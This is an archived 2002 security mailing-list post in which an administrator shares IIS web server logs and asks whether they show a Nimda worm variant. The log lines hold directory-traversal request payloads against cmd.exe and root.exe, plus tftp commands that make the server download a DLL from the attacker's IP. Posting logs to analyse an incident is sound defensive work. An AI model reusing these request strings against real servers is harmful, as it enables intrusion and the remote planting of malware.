Hi, need some advice for the below log, can anyone advice if its are a pattern of Nimda which I find it rather strange because it downloads cool.dll and httpodbc.dll instead of Admin.dll. Norton Antivirus reported a W32.Nimda.E@MM (dr) virus, is it a new variant?? Thanks and regards. 2002-09-16 07:53:21 202.100.249.231 - xxxx 80 GET /scripts/root.exe /c+dir 404 - 2002-09-16 07:53:21 202.100.249.231 - xxxx 80 GET /MSADC/root.exe /c+dir 403 - 2002-09-16 07:53:23 202.100.249.231 - xxxx 80 GET /c/winnt/system32/cmd.exe /c+dir 404 - 2002-09-16 07:53:23 202.100.249.231 - xxxx 80 GET /d/winnt/system32/cmd.exe /c+dir 404 - 2002-09-16 07:53:25 202.100.249.231 - xxxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 - 2002-09-16 07:53:56 202.100.249.231 - xxxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+tftp%20-i%20202.100.249.231%20GET%20 cool.dll%20c:\httpodbc.dll 502 - 2002-09-16 07:54:24 202.100.249.231 - 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+tftp%20-i%20202.100.249.231%20GET%20cool.dll%20d:\httpodbc.dll 502 - 2002-09-16 07:54:51 202.100.249.231 - 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+tftp%20-i%20202.100.249.231%20GET%20cool.dll%20e:\httpodbc.dll 502 - 2002-09-16 07:54:53 202.100.249.231 - 80 GET /scripts/..%5c../httpodbc.dll - 500 - 2002-09-16 07:54:53 202.100.249.231 - 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 200 - 2002-09-16 07:54:54 202.100.249.231 - 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+tftp%20-i%20202.100.249.231%20GET%20cool.dll%20c:\httpodbc.dll 502 - 2002-09-16 07:54:54 202.100.249.231 - 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+tftp%20-i%20202.100.249.231%20GET%20cool.dll%20d:\httpodbc.dll 502 - 2002-09-16 07:54:55 202.100.249.231 - 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+tftp%20-i%20202.100.249.231%20GET%20cool.dll%20e:\httpodbc.dll 502 - 2002-09-16 07:54:55 202.100.249.231 - 80 GET /_vti_bin/..%5c../..%5c../..%5c../httpodbc.dll - 500 - 2002-09-16 07:54:55 202.100.249.231 - 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 - 2002-09-16 07:54:57 202.100.249.231 - 80 GET /msadc/..%5c../..%5c../..%5c/.. Á ../.. Á ../.. Á ../winnt/system32/cmd.exe /c+dir 403 - 2002-09-16 07:54:57 202.100.249.231 - 80 GET /scripts/.. Á ../winnt/system32/cmd.exe /c+dir 500 - 2002-09-16 07:54:58 202.100.249.231 - 80 GET /scripts/winnt/system32/cmd.exe /c+dir 404 - 2002-09-16 07:54:58 202.100.249.231 - 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir 200 - ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Tue Sep 17 2002 - 17:38:52 PDT